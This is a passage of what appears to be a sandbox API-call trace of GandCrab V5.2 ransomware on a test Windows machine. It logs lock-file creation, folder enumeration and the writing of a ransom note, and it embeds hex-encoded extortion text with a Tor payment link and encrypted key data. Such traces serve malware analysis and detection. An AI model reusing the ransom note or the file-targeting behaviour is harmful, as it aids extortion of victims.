x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.828] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0072.829] CloseHandle (hObject=0x2bc) returned 1 [0072.829] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.829] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.830] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x12, wMilliseconds=0x89)) [0072.830] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.830] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.830] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.830] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\d2ca4a09d2ca4deb61a.lock") returned 80 [0072.830] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\onenote\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0072.831] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.831] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.831] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\") returned 56 [0072.831] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\*" [0072.831] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5034f8 [0072.831] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.831] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.831] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.831] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.832] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.832] lstrcmpW (lpString1="16.0", lpString2=".") returned 1 [0072.832] lstrcmpW (lpString1="16.0", lpString2="..") returned 1 [0072.832] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\", lpString2="16.0" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0" [0072.832] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\" [0072.832] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.832] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.832] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.832] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.832] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.832] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.832] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.833] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.833] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.833] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.833] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.833] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\\\TITWMVJL-DECRYPT.txt") returned 82 [0072.833] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\onenote\\16.0\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0072.833] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c